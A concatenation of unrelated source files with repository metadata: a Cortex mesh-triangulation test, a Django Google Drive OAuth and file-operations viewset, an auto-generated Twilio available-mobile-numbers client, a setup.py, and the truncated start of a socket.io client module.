        vertexIds.append( 1 )
        vertexIds.append( 2 )
        vertexIds.append( 3 )

        P = IECore.V3dVectorData()
        P.append( imath.V3d( -1, 0, -1 ) )
        P.append( imath.V3d( -1, 0, 1 ) )
        P.append( imath.V3d( 1, 0, 1 ) )
        # This point folds the quad back on itself, making it concave.
        P.append( imath.V3d( -0.9, 0, -0.9 ) )

        m = IECoreScene.MeshPrimitive( verticesPerFace, vertexIds )
        m["P"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, P )

        op = IECoreScene.TriangulateOp()

        op["input"] = m

        # Concave faces not supported by default
        self.assertRaises( RuntimeError, op )

        op.parameters()["throwExceptions"] = False
        result = op()

    def testErrors( self ):
        """ Test TriangulateOp with invalid P data """

        verticesPerFace = IECore.IntVectorData()
        verticesPerFace.append( 4 )

        vertexIds = IECore.IntVectorData()
        vertexIds.append( 0 )
        vertexIds.append( 1 )
        vertexIds.append( 2 )
        vertexIds.append( 3 )

        # "P" must be vector data (V3f/V3d), not a flat float array.
        P = IECore.FloatVectorData()
        P.append( 1 )
        P.append( 2 )
        P.append( 3 )
        P.append( 4 )

        m = IECoreScene.MeshPrimitive( verticesPerFace, vertexIds )
        m["P"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, P )

        op = IECoreScene.TriangulateOp()

        op["input"] = m

        # FloatVectorData not valid for "P"
        self.assertRaises( RuntimeError, op )

    def testConstantPrimVars( self ) :

        # Constant-interpolation primvars must survive triangulation untouched.
        m = IECore.Reader.create( "test/IECore/data/cobFiles/polySphereQuads.cob").read()

        m["constantScalar"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Constant, IECore.FloatData( 1 ) )
        m["constantArray"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Constant, IECore.StringVectorData( [ "one", "two" ] ) )

        result = IECoreScene.TriangulateOp()( input = m )
        self.assert_( result.arePrimitiveVariablesValid() )

    def testInterpolationShouldntChange( self ) :

        # Triangulating in place must not reset the subdiv interpolation scheme.
        m = IECoreScene.MeshPrimitive.createPlane( imath.Box2f( imath.V2f( -1 ), imath.V2f( 1 ) ) )
        m.setTopology( m.verticesPerFace, m.vertexIds, "catmullClark" )

        IECoreScene.TriangulateOp()( input = m, copyInput = False )

        self.assertEqual( m.interpolation, "catmullClark" )

    def testFaceVaryingIndices( self ) :

        # Indexed face-varying primvars keep their data and get remapped indices.
        m = IECoreScene.MeshPrimitive.createPlane( imath.Box2f( imath.V2f( -1 ), imath.V2f( 1 ) ) )
        m["uv"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.FaceVarying, m["uv"].data, IECore.IntVectorData( [ 0, 3, 1, 2 ] ) )

        m2 = IECoreScene.TriangulateOp()( input = m, copyInput = True )
        self.assertTrue( m2.arePrimitiveVariablesValid() )

        self.assertEqual( m2["uv"].data, m["uv"].data )
        self.assertEqual( m2["uv"].indices, IECore.IntVectorData( [ 0, 3, 1, 0, 1, 2 ] ) )

    def testUniformIndices( self ) :

        # Indexed uniform primvars: one index per face, duplicated per triangle.
        m = IECoreScene.MeshPrimitive.createPlane( imath.Box2f( imath.V2f( -4 ), imath.V2f( 4 ) ), divisions = imath.V2i( 2, 2 ) )
        m["myString"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Uniform, IECore.StringVectorData( [ "a", "b" ] ), IECore.IntVectorData( [ 1, 0, 0, 1 ] ) )

        m2 = IECoreScene.TriangulateOp()( input = m, copyInput = True )
        self.assertTrue( m2.arePrimitiveVariablesValid() )

        self.assertEqual( m2["myString"].data, m["myString"].data )
        self.assertEqual( m2["myString"].indices, IECore.IntVectorData( [ 1, 1, 0, 0, 0, 0, 1, 1 ] ) )

    @unittest.skipUnless( os.environ.get("CORTEX_PERFORMANCE_TEST", False), "'CORTEX_PERFORMANCE_TEST' env var not set" )
    def testTriangulatePerformance( self ):

        # Manual benchmark, opt-in only; reads an animated mesh from a local
        # cache path that presumably must be edited to point at real data.
        for i in range(10):
            root = IECoreScene.SceneInterface.create( "/path/to/cache.scc", IECore.IndexedIO.OpenMode.Read )
            body = root.scene(['location', 'of', 'object'])

            objects = []
            for f in range( 850, 1000 ):
                objects.append( body.readObject(f / 24.0 ))

            timer = IECore.Timer( True, IECore.Timer.Mode.WallClock )

            totalNumTriangles = 0
            for o in objects:
                o = IECoreScene.TriangulateOp()( input = o, throwExceptions = False )
                totalNumTriangles += o.numFaces()

            t = timer.totalElapsed()
            print "=== run {0} ===".format(i)
            print "total time: {0}s".format( t )
            print "time / object: {0} milliseconds".format( 1000.0 * t / len(objects) )
            print "time / triangle: {0} microseconds".format( 1000000.0 * t / totalNumTriangles )
# Allow running this test file directly.
if __name__ == "__main__":
    unittest.main()
| {
"content_hash": "abb7bddb252e1de2eec7b925146bdd34",
"timestamp": "",
"source": "github",
"line_count": 289,
"max_line_length": 183,
"avg_line_length": 28.889273356401382,
"alnum_prop": 0.6840340160498263,
"repo_name": "appleseedhq/cortex",
"id": "cff83a44a40ae7d8fbd5e8c523053ee2dfdd61e7",
"size": "10138",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/IECoreScene/TriangulateOp.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "1374"
},
{
"name": "C",
"bytes": "66503"
},
{
"name": "C++",
"bytes": "9536541"
},
{
"name": "CMake",
"bytes": "95418"
},
{
"name": "GLSL",
"bytes": "24422"
},
{
"name": "Mathematica",
"bytes": "255937"
},
{
"name": "Objective-C",
"bytes": "2360"
},
{
"name": "Python",
"bytes": "4651272"
},
{
"name": "Tcl",
"bytes": "1796"
}
],
"symlink_target": ""
} |
import httplib2
from apiclient import discovery, errors
from rest_framework.viewsets import ViewSet
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from rest_framework import status
from csp import settings
from crowdsourcing import models
from apiclient.http import MediaFileUpload
# TODO add support for api ajax calls
class GoogleDriveOauth(ViewSet):
    """OAuth2 handshake endpoints for linking a Google Drive account.

    ``auth_init`` starts the flow and returns Google's authorization URL;
    ``auth_end`` exchanges the returned code for credentials and creates
    (or reactivates) the matching ``ExternalAccount`` record.
    """
    permission_classes = [IsAuthenticated]

    def get_flow(self, request):
        """Build the OAuth2 web-server flow from project settings.

        ``access_type='offline'`` requests a refresh token; ``approval_prompt``
        forces the consent screen so a refresh token is issued every time.
        """
        from oauth2client.client import OAuth2WebServerFlow
        auth_flow = OAuth2WebServerFlow(settings.GOOGLE_DRIVE_CLIENT_ID, settings.GOOGLE_DRIVE_CLIENT_SECRET,
                                        settings.GOOGLE_DRIVE_OAUTH_SCOPE, settings.GOOGLE_DRIVE_REDIRECT_URI,
                                        approval_prompt='force', access_type='offline')
        return auth_flow

    def auth_init(self, request):
        """Persist a new flow for this user and return the authorize URL."""
        auth_flow = self.get_flow(request)
        flow_model = models.GoogleAuth()
        flow_model.flow = auth_flow
        flow_model.id = request.user
        flow_model.save()
        authorize_url = auth_flow.step1_get_authorize_url()
        return Response({'authorize_url': authorize_url}, status=status.HTTP_200_OK)

    def auth_end(self, request):
        """Finish the OAuth2 flow.

        Exchanges the authorization code for credentials, reads the account's
        quota from the Drive "about" resource, and either reactivates an
        existing ``ExternalAccount`` or creates a new one (including a
        "crowdresearch" root folder on the user's Drive).
        """
        from oauth2client.django_orm import Storage
        from apiclient.discovery import build
        auth_flow = models.GoogleAuth.objects.get(id=request.user).flow
        credentials = auth_flow.step2_exchange(request.data.get('code'))
        http = httplib2.Http()
        http = credentials.authorize(http)
        drive_service = build('drive', 'v2', http=http)
        try:
            account_info = drive_service.about().get().execute()
            user_info = account_info['user']
            quota_info = account_info['quotaBytesByService']
            drive_quota = [drive['bytesUsed'] for drive in quota_info if drive['serviceName'] == 'DRIVE']
            drive_bytes_used = drive_quota.pop()
            quota_bytes_total = account_info['quotaBytesTotal']
            try:
                # Account was linked before: just reactivate it.
                # NOTE(review): credentials are not refreshed on this path --
                # confirm that is intended.
                account_check = models.ExternalAccount.objects.get(type='GOOGLEDRIVE', email=user_info['emailAddress'])
                account_check.is_active = 1
                account_check.status = 1
                account_check.save()
            except models.ExternalAccount.DoesNotExist:
                # First link for this Drive account: record quota, create the
                # root folder on Drive, and persist the credentials.
                account = models.ExternalAccount()
                account.owner = request.user
                account.email = user_info['emailAddress']
                account.access_token = credentials.to_json()
                account.description = user_info['displayName'] + '(' + user_info['emailAddress'] + ')'
                account.type = 'GOOGLEDRIVE'
                account.quota = quota_bytes_total
                account.assigned_space = quota_bytes_total
                account.used_space = drive_bytes_used
                account.is_active = 1
                body = {
                    'title': 'crowdresearch',
                    'mimeType': 'application/vnd.google-apps.folder'
                }
                account.root = drive_service.files().insert(body=body).execute()['id']
                account.name = 'Google Drive'
                account.status = 1
                account.save()
                storage = Storage(models.GoogleCredential, 'account', account, 'credential')
                storage.put(credentials)
        except Exception:
            # BUG FIX: the failure response was previously created but never
            # returned, so clients always received 201 even when linking failed.
            return Response({"message": "Failed to add account, please retry"}, status.HTTP_400_BAD_REQUEST)
        return Response({"message": "OK"}, status.HTTP_201_CREATED)
class GoogleDriveViewSet(ViewSet):
    """Query endpoint that resolves a slash-separated path inside the
    authenticated user's linked Google Drive, one folder level at a time."""
    permission_classes = [IsAuthenticated]

    def query(self, request):
        """Walk ``?path=a/b/c`` from the account's root folder and return the
        Drive file resources matching the final path component.

        Returns 404 with an empty list when any component does not exist,
        and 400 when the ``path`` parameter is missing.
        """
        file_name = request.query_params.get('path')
        if not file_name:
            # Robustness: previously a missing parameter crashed on
            # None.split('/') with an AttributeError (HTTP 500).
            return Response({'message': "'path' query parameter is required"}, 400)
        components = file_name.split('/')
        account = models.ExternalAccount.objects.get(owner=request.user, type='GOOGLEDRIVE')
        root = account.root
        drive_util = GoogleDriveUtil(account_instance=account)
        file_list = []
        for component in components:
            file_list = drive_util.list_files_in_folder(root, "title = '" + component + "'")
            if not file_list:
                # BUG FIX: an empty match previously raised IndexError on
                # file_list[0] (HTTP 500); report "not found" instead.
                return Response([], 404)
            root = file_list[0]['id']
        return Response(file_list, 200)
class GoogleDriveUtil(object):
    """Thin wrapper around the Google Drive v2 API for one linked account.

    Builds an authorized ``drive_service`` from the account's stored
    credentials and exposes listing, CRUD and download helpers.  Most
    helpers return ``None`` on ``HttpError`` rather than raising.
    """

    def __init__(self, account_instance):
        """Authorize an HTTP client with the account's stored credentials."""
        credential_model = models.GoogleCredential.objects.get(account=account_instance)
        get_credential = credential_model.credential
        http = httplib2.Http()
        http = get_credential.authorize(http)
        drive_service = discovery.build('drive', 'v2', http=http)
        self.drive_service = drive_service

    def list_files_in_folder(self, folder_id, q):
        """Return full file resources for children of ``folder_id`` matching
        the Drive query ``q``, following pagination.

        NOTE: on ``HttpError`` this returns an error *string* instead of a
        list; callers must be prepared for either.
        """
        file_list = []
        page_token = None
        while True:
            try:
                # 'q' is applied on every page; pageToken only after page one.
                params = {'q': q}
                if page_token:
                    params['pageToken'] = page_token
                children = self.drive_service.children().list(folderId=folder_id, **params).execute()
                # children().list() only returns ids, so fetch each full
                # file resource individually.
                for child in children.get('items', []):
                    file_list.append(self.drive_service.files().get(fileId=child['id']).execute())
                page_token = children.get('nextPageToken')
                if not page_token:
                    break
            except errors.HttpError as error:
                message = 'An error occurred: ' + error.content
                return message
        return file_list

    def search_file(self, account_instance, file_title):
        """Search for ``file_title`` under the account's root folder."""
        root_id = models.GoogleCredential.objects.get(account=account_instance).account.root
        # NOTE(review): getPathId is not defined on this class, so this call
        # raises NameError at runtime -- confirm which helper was intended.
        parent_id = self.getPathId(root_id)  # get the id of the parent folder
        # BUG FIX: Drive v2 query syntax requires the parent id and the title
        # to be quoted, i.e. "'<id>' in parents and title = '<name>'".
        query = "'" + str(parent_id) + "' in parents and title = '" + file_title + "'"
        contents = self.list_files_in_folder(parent_id, query)
        return contents

    def create_folder(self, title, parent_id='', mime_type='application/vnd.google-apps.folder'):
        """Create a folder named ``title``; returns the file resource or
        ``None`` on failure."""
        body = {
            'title': title,
            'mimeType': mime_type
        }
        if parent_id:
            body['parents'] = [{'id': parent_id}]
        try:
            created = self.drive_service.files().insert(body=body).execute()
            return created
        except errors.HttpError:
            return None

    def insert(self, file_name, title, parent_id=None, mime_type='application/octet-stream', resumable=True):
        """Upload local file ``file_name`` as ``title``.

        BUG FIX: ``parent_id`` previously defaulted to a shared mutable list;
        ``None`` is equally falsy and safe.  Returns the file resource or
        ``None`` on failure.
        """
        media_body = MediaFileUpload(file_name, mimetype=mime_type, resumable=resumable)
        body = {
            'title': title,
            'mimeType': mime_type
        }
        if parent_id:
            body['parents'] = [{'id': parent_id}]
        try:
            uploaded = self.drive_service.files().insert(body=body, media_body=media_body).execute()
            return uploaded
        except errors.HttpError:
            return None

    def update(self, file_id, new_revision, new_filename, mime_type='application/octet-stream'):
        """Replace the content of ``file_id`` with local file ``new_filename``.

        Returns the updated file resource or ``None`` on failure.
        """
        try:
            # First retrieve the file from the API.
            file_resource = self.drive_service.files().get(fileId=file_id).execute()
            # File's new content.
            media_body = MediaFileUpload(new_filename, mimetype=mime_type, resumable=True)
            # Send the request to the API.
            updated_file = self.drive_service.files().update(
                fileId=file_id,
                body=file_resource,
                newRevision=new_revision,
                media_body=media_body).execute()
            return updated_file
        except errors.HttpError:
            return None

    def trash(self, file_id):
        """Move ``file_id`` to the trash; returns the file resource, or the
        error string on failure (NOTE: inconsistent with the other helpers)."""
        try:
            return self.drive_service.files().trash(fileId=file_id).execute()
        except errors.HttpError as error:
            return str(error)

    def untrash(self, file_id):
        """Restore ``file_id`` from the trash; ``None`` on failure."""
        try:
            return self.drive_service.files().untrash(fileId=file_id).execute()
        except errors.HttpError:
            return None

    def delete(self, file_id):
        """Permanently delete ``file_id``; ``None`` on failure."""
        try:
            return self.drive_service.files().delete(fileId=file_id).execute()
        except errors.HttpError:
            return None

    def download(self, file_id):
        """Return the raw content of ``file_id``, or ``None`` if the file
        cannot be fetched or has no ``downloadUrl`` (e.g. native Google
        Docs formats)."""
        try:
            file_resource = self.drive_service.files().get(fileId=file_id).execute()
        except errors.HttpError:
            return None
        download_url = file_resource.get('downloadUrl')
        if not download_url:
            return None
        resp, content = self.drive_service._http.request(download_url)
        if resp.status == 200:
            return content
        return None

    def get(self, file_id):
        """Return the file resource for ``file_id``; ``None`` on failure."""
        try:
            return self.drive_service.files().get(fileId=file_id).execute()
        except errors.HttpError:
            return None

    def get_account_info(self):
        """Return the Drive "about" resource for the authorized account."""
        account_info = self.drive_service.about().get().execute()
        return account_info
| {
"content_hash": "9c6a8a5f691f6f667c49176744bd286f",
"timestamp": "",
"source": "github",
"line_count": 223,
"max_line_length": 119,
"avg_line_length": 40.08071748878924,
"alnum_prop": 0.5883866636831506,
"repo_name": "shirishgoyal/crowdsource-platform",
"id": "d635e78a3a28894d921abe370a62bd27277ec4ce",
"size": "8938",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop2",
"path": "crowdsourcing/viewsets/google_drive.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "63075"
},
{
"name": "HTML",
"bytes": "229504"
},
{
"name": "JavaScript",
"bytes": "312581"
},
{
"name": "Python",
"bytes": "748797"
},
{
"name": "Shell",
"bytes": "838"
}
],
"symlink_target": ""
} |
"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from twilio.base import deserialize
from twilio.base import values
from twilio.base.instance_resource import InstanceResource
from twilio.base.list_resource import ListResource
from twilio.base.page import Page
class MobileList(ListResource):
    """List resource for available mobile phone numbers in one country,
    scoped to one account.  Auto-generated by the Twilio code generator;
    all query parameters are passed straight through to the REST API."""

    def __init__(self, version, account_sid, country_code):
        """
        Initialize the MobileList

        :param Version version: Version that contains the resource
        :param account_sid: The 34 character string that uniquely identifies your account.
        :param country_code: The ISO Country code to lookup phone numbers for.

        :returns: twilio.rest.api.v2010.account.available_phone_number.mobile.MobileList
        :rtype: twilio.rest.api.v2010.account.available_phone_number.mobile.MobileList
        """
        super(MobileList, self).__init__(version)

        # Path Solution
        self._solution = {
            'account_sid': account_sid,
            'country_code': country_code,
        }
        self._uri = '/Accounts/{account_sid}/AvailablePhoneNumbers/{country_code}/Mobile.json'.format(**self._solution)

    def stream(self, area_code=values.unset, contains=values.unset,
               sms_enabled=values.unset, mms_enabled=values.unset,
               voice_enabled=values.unset,
               exclude_all_address_required=values.unset,
               exclude_local_address_required=values.unset,
               exclude_foreign_address_required=values.unset, beta=values.unset,
               near_number=values.unset, near_lat_long=values.unset,
               distance=values.unset, in_postal_code=values.unset,
               in_region=values.unset, in_rate_center=values.unset,
               in_lata=values.unset, limit=None, page_size=None):
        """
        Streams MobileInstance records from the API as a generator stream.
        This operation lazily loads records as efficiently as possible until the limit
        is reached.
        The results are returned as a generator, so this operation is memory efficient.

        :param unicode area_code: The area_code
        :param unicode contains: The contains
        :param bool sms_enabled: The sms_enabled
        :param bool mms_enabled: The mms_enabled
        :param bool voice_enabled: The voice_enabled
        :param bool exclude_all_address_required: The exclude_all_address_required
        :param bool exclude_local_address_required: The exclude_local_address_required
        :param bool exclude_foreign_address_required: The exclude_foreign_address_required
        :param bool beta: The beta
        :param unicode near_number: The near_number
        :param unicode near_lat_long: The near_lat_long
        :param unicode distance: The distance
        :param unicode in_postal_code: The in_postal_code
        :param unicode in_region: The in_region
        :param unicode in_rate_center: The in_rate_center
        :param unicode in_lata: The in_lata
        :param int limit: Upper limit for the number of records to return. stream()
                          guarantees to never return more than limit. Default is no limit
        :param int page_size: Number of records to fetch per request, when not set will use
                              the default value of 50 records. If no page_size is defined
                              but a limit is defined, stream() will attempt to read the
                              limit with the most efficient page size, i.e. min(limit, 1000)

        :returns: Generator that will yield up to limit results
        :rtype: list[twilio.rest.api.v2010.account.available_phone_number.mobile.MobileInstance]
        """
        # Resolve limit/page_size into the effective paging parameters.
        limits = self._version.read_limits(limit, page_size)

        # Fetch the first page eagerly; the version's stream() lazily pulls
        # the remaining pages as the generator is consumed.
        page = self.page(
            area_code=area_code,
            contains=contains,
            sms_enabled=sms_enabled,
            mms_enabled=mms_enabled,
            voice_enabled=voice_enabled,
            exclude_all_address_required=exclude_all_address_required,
            exclude_local_address_required=exclude_local_address_required,
            exclude_foreign_address_required=exclude_foreign_address_required,
            beta=beta,
            near_number=near_number,
            near_lat_long=near_lat_long,
            distance=distance,
            in_postal_code=in_postal_code,
            in_region=in_region,
            in_rate_center=in_rate_center,
            in_lata=in_lata,
            page_size=limits['page_size'],
        )

        return self._version.stream(page, limits['limit'], limits['page_limit'])

    def list(self, area_code=values.unset, contains=values.unset,
             sms_enabled=values.unset, mms_enabled=values.unset,
             voice_enabled=values.unset, exclude_all_address_required=values.unset,
             exclude_local_address_required=values.unset,
             exclude_foreign_address_required=values.unset, beta=values.unset,
             near_number=values.unset, near_lat_long=values.unset,
             distance=values.unset, in_postal_code=values.unset,
             in_region=values.unset, in_rate_center=values.unset,
             in_lata=values.unset, limit=None, page_size=None):
        """
        Lists MobileInstance records from the API as a list.
        Unlike stream(), this operation is eager and will load `limit` records into
        memory before returning.

        :param unicode area_code: The area_code
        :param unicode contains: The contains
        :param bool sms_enabled: The sms_enabled
        :param bool mms_enabled: The mms_enabled
        :param bool voice_enabled: The voice_enabled
        :param bool exclude_all_address_required: The exclude_all_address_required
        :param bool exclude_local_address_required: The exclude_local_address_required
        :param bool exclude_foreign_address_required: The exclude_foreign_address_required
        :param bool beta: The beta
        :param unicode near_number: The near_number
        :param unicode near_lat_long: The near_lat_long
        :param unicode distance: The distance
        :param unicode in_postal_code: The in_postal_code
        :param unicode in_region: The in_region
        :param unicode in_rate_center: The in_rate_center
        :param unicode in_lata: The in_lata
        :param int limit: Upper limit for the number of records to return. list() guarantees
                          never to return more than limit. Default is no limit
        :param int page_size: Number of records to fetch per request, when not set will use
                              the default value of 50 records. If no page_size is defined
                              but a limit is defined, list() will attempt to read the limit
                              with the most efficient page size, i.e. min(limit, 1000)

        :returns: Generator that will yield up to limit results
        :rtype: list[twilio.rest.api.v2010.account.available_phone_number.mobile.MobileInstance]
        """
        # Eager variant: simply materialize the stream() generator.
        return list(self.stream(
            area_code=area_code,
            contains=contains,
            sms_enabled=sms_enabled,
            mms_enabled=mms_enabled,
            voice_enabled=voice_enabled,
            exclude_all_address_required=exclude_all_address_required,
            exclude_local_address_required=exclude_local_address_required,
            exclude_foreign_address_required=exclude_foreign_address_required,
            beta=beta,
            near_number=near_number,
            near_lat_long=near_lat_long,
            distance=distance,
            in_postal_code=in_postal_code,
            in_region=in_region,
            in_rate_center=in_rate_center,
            in_lata=in_lata,
            limit=limit,
            page_size=page_size,
        ))

    def page(self, area_code=values.unset, contains=values.unset,
             sms_enabled=values.unset, mms_enabled=values.unset,
             voice_enabled=values.unset, exclude_all_address_required=values.unset,
             exclude_local_address_required=values.unset,
             exclude_foreign_address_required=values.unset, beta=values.unset,
             near_number=values.unset, near_lat_long=values.unset,
             distance=values.unset, in_postal_code=values.unset,
             in_region=values.unset, in_rate_center=values.unset,
             in_lata=values.unset, page_token=values.unset,
             page_number=values.unset, page_size=values.unset):
        """
        Retrieve a single page of MobileInstance records from the API.
        Request is executed immediately

        :param unicode area_code: The area_code
        :param unicode contains: The contains
        :param bool sms_enabled: The sms_enabled
        :param bool mms_enabled: The mms_enabled
        :param bool voice_enabled: The voice_enabled
        :param bool exclude_all_address_required: The exclude_all_address_required
        :param bool exclude_local_address_required: The exclude_local_address_required
        :param bool exclude_foreign_address_required: The exclude_foreign_address_required
        :param bool beta: The beta
        :param unicode near_number: The near_number
        :param unicode near_lat_long: The near_lat_long
        :param unicode distance: The distance
        :param unicode in_postal_code: The in_postal_code
        :param unicode in_region: The in_region
        :param unicode in_rate_center: The in_rate_center
        :param unicode in_lata: The in_lata
        :param str page_token: PageToken provided by the API
        :param int page_number: Page Number, this value is simply for client state
        :param int page_size: Number of records to return, defaults to 50

        :returns: Page of MobileInstance
        :rtype: twilio.rest.api.v2010.account.available_phone_number.mobile.MobilePage
        """
        # values.of() drops unset entries so only explicit filters are sent.
        params = values.of({
            'AreaCode': area_code,
            'Contains': contains,
            'SmsEnabled': sms_enabled,
            'MmsEnabled': mms_enabled,
            'VoiceEnabled': voice_enabled,
            'ExcludeAllAddressRequired': exclude_all_address_required,
            'ExcludeLocalAddressRequired': exclude_local_address_required,
            'ExcludeForeignAddressRequired': exclude_foreign_address_required,
            'Beta': beta,
            'NearNumber': near_number,
            'NearLatLong': near_lat_long,
            'Distance': distance,
            'InPostalCode': in_postal_code,
            'InRegion': in_region,
            'InRateCenter': in_rate_center,
            'InLata': in_lata,
            'PageToken': page_token,
            'Page': page_number,
            'PageSize': page_size,
        })

        response = self._version.page(
            'GET',
            self._uri,
            params=params,
        )

        return MobilePage(self._version, response, self._solution)

    def __repr__(self):
        """
        Provide a friendly representation

        :returns: Machine friendly representation
        :rtype: str
        """
        return '<Twilio.Api.V2010.MobileList>'
class MobilePage(Page):
    """A single page of available-mobile-number results returned by the API."""

    def __init__(self, version, response, solution):
        """
        Initialize the MobilePage

        :param Version version: Version that contains the resource
        :param Response response: Response from the API
        :param solution: Path solution dict carrying account_sid and country_code

        :returns: twilio.rest.api.v2010.account.available_phone_number.mobile.MobilePage
        :rtype: twilio.rest.api.v2010.account.available_phone_number.mobile.MobilePage
        """
        super(MobilePage, self).__init__(version, response)

        # Keep the path solution so each instance can be built with the
        # account/country context of this list.
        self._solution = solution

    def get_instance(self, payload):
        """
        Build a MobileInstance from one raw API record.

        :param dict payload: Payload response from the API

        :returns: twilio.rest.api.v2010.account.available_phone_number.mobile.MobileInstance
        :rtype: twilio.rest.api.v2010.account.available_phone_number.mobile.MobileInstance
        """
        solution = self._solution
        return MobileInstance(
            self._version,
            payload,
            account_sid=solution['account_sid'],
            country_code=solution['country_code'],
        )

    def __repr__(self):
        """
        Provide a friendly representation

        :returns: Machine friendly representation
        :rtype: str
        """
        return '<Twilio.Api.V2010.MobilePage>'
class MobileInstance(InstanceResource):
    """One available mobile phone number, as reported by the API."""

    # Payload keys copied through unchanged; latitude/longitude are handled
    # separately because they need decimal deserialization.
    _PASSTHROUGH_KEYS = (
        'friendly_name',
        'phone_number',
        'lata',
        'rate_center',
        'region',
        'postal_code',
        'iso_country',
        'address_requirements',
        'beta',
        'capabilities',
    )

    def __init__(self, version, payload, account_sid, country_code):
        """
        Initialize the MobileInstance

        :returns: twilio.rest.api.v2010.account.available_phone_number.mobile.MobileInstance
        :rtype: twilio.rest.api.v2010.account.available_phone_number.mobile.MobileInstance
        """
        super(MobileInstance, self).__init__(version)

        # Marshal the raw payload into the properties dict.
        marshaled = {key: payload[key] for key in self._PASSTHROUGH_KEYS}
        marshaled['latitude'] = deserialize.decimal(payload['latitude'])
        marshaled['longitude'] = deserialize.decimal(payload['longitude'])
        self._properties = marshaled

        # Context
        self._context = None
        self._solution = {
            'account_sid': account_sid,
            'country_code': country_code,
        }

    @property
    def friendly_name(self):
        """
        :returns: Human-readable form of the number
        :rtype: unicode
        """
        return self._properties['friendly_name']

    @property
    def phone_number(self):
        """
        :returns: The phone number itself
        :rtype: unicode
        """
        return self._properties['phone_number']

    @property
    def lata(self):
        """
        :returns: The number's LATA
        :rtype: unicode
        """
        return self._properties['lata']

    @property
    def rate_center(self):
        """
        :returns: The number's rate center
        :rtype: unicode
        """
        return self._properties['rate_center']

    @property
    def latitude(self):
        """
        :returns: The number's latitude (deserialized decimal)
        :rtype: unicode
        """
        return self._properties['latitude']

    @property
    def longitude(self):
        """
        :returns: The number's longitude (deserialized decimal)
        :rtype: unicode
        """
        return self._properties['longitude']

    @property
    def region(self):
        """
        :returns: The number's region
        :rtype: unicode
        """
        return self._properties['region']

    @property
    def postal_code(self):
        """
        :returns: The number's postal code
        :rtype: unicode
        """
        return self._properties['postal_code']

    @property
    def iso_country(self):
        """
        :returns: The number's ISO country code
        :rtype: unicode
        """
        return self._properties['iso_country']

    @property
    def address_requirements(self):
        """
        :returns: The number's address requirements
        :rtype: unicode
        """
        return self._properties['address_requirements']

    @property
    def beta(self):
        """
        :returns: Whether the number is in beta
        :rtype: bool
        """
        return self._properties['beta']

    @property
    def capabilities(self):
        """
        :returns: The number's capabilities
        :rtype: unicode
        """
        return self._properties['capabilities']

    def __repr__(self):
        """
        Provide a friendly representation

        :returns: Machine friendly representation
        :rtype: str
        """
        return '<Twilio.Api.V2010.MobileInstance>'
| {
"content_hash": "53ba91804e62fb55d3bc8392d9c716c8",
"timestamp": "",
"source": "github",
"line_count": 423,
"max_line_length": 119,
"avg_line_length": 38.22458628841608,
"alnum_prop": 0.6117261426185912,
"repo_name": "angadpc/Alexa-Project-",
"id": "dd260f701aabb543b1cf460c0daa4c1d34a35761",
"size": "16184",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "twilio/rest/api/v2010/account/available_phone_number/mobile.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "3097013"
},
{
"name": "Shell",
"bytes": "93"
}
],
"symlink_target": ""
} |
from setuptools import setup
import io
import os
import sys

# Directory containing this setup.py; needed to locate requirements.txt.
# BUG FIX: `here` was previously used below without ever being defined,
# raising NameError on any non-ReadTheDocs install.
here = os.path.abspath(os.path.dirname(__file__))

on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
if on_rtd:
    # Read the Docs cannot install the real requirements; fall back to the
    # minimal set needed to build the documentation.
    if sys.version_info < (3, 3):
        requires = ['mock']  # for python2 and python < 3.3
    else:
        requires = []  # for >= python3.3
else:
    # Place install_requires into the text file "requirements.txt".
    # io.open is used so the encoding argument also works on Python 2.
    with io.open(os.path.join(here, 'requirements.txt'), encoding='utf-8') as f2:
        requires = f2.read().strip().splitlines()

setup(name='computer',
      version='0.1',
      description='Abstraction for performing tasks on servers.',
      url='http://github.com/jrising/computer',
      author='James Rising',
      author_email='jarising@gmail.com',
      license='GNU v. 3',
      packages=['computer'],
      # BUG FIX: `requires` was computed above but never passed to setup(),
      # so dependencies were silently not installed.
      install_requires=requires,
      zip_safe=False)
| {
"content_hash": "8c2779b9a851c5cf53843792106590a5",
"timestamp": "",
"source": "github",
"line_count": 25,
"max_line_length": 78,
"avg_line_length": 30.84,
"alnum_prop": 0.62905317769131,
"repo_name": "jrising/computer",
"id": "62669192bb5e6848f00d7edbca681f5c42f00033",
"size": "771",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "33383"
}
],
"symlink_target": ""
} |
from Queue import Queue
from threading import _Event, Thread
from urlparse import urlparse
from functools import partial
from socketIO_client import SocketIO, SocketIONamespace, EngineIONamespace
from exceptions import HeimdallrClientException
from utils import timestamp, for_own_methods, on_ready
from settings import AUTH_SOURCE, URL
__all__ = ['Client', 'Provider', 'Consumer']
# Replacement for socketIO_client's EngineIONamespace.__init__: identical to
# the original except that the logger name is taken from the Heimdallr
# client URL (Client._url) instead of socketIO_client's own value.
def _init(self, io):
    self._io = io
    self._callback_by_event = {}
    self._log_name = Client._url
    self.initialize()

# Monkey-patch: every EngineIONamespace created from here on uses _init.
EngineIONamespace.__init__ = _init
class _SocketIO(SocketIO):
    """SocketIO subclass whose wait loop can additionally be stopped by
    setting a threading event passed via the ``event`` keyword argument."""

    def _should_stop_waiting(self, **kwargs):
        # Remove our custom keyword before delegating to the parent class,
        # which does not understand it.
        event = kwargs.pop('event', None)
        parent_says_stop = super(_SocketIO, self)._should_stop_waiting(**kwargs)
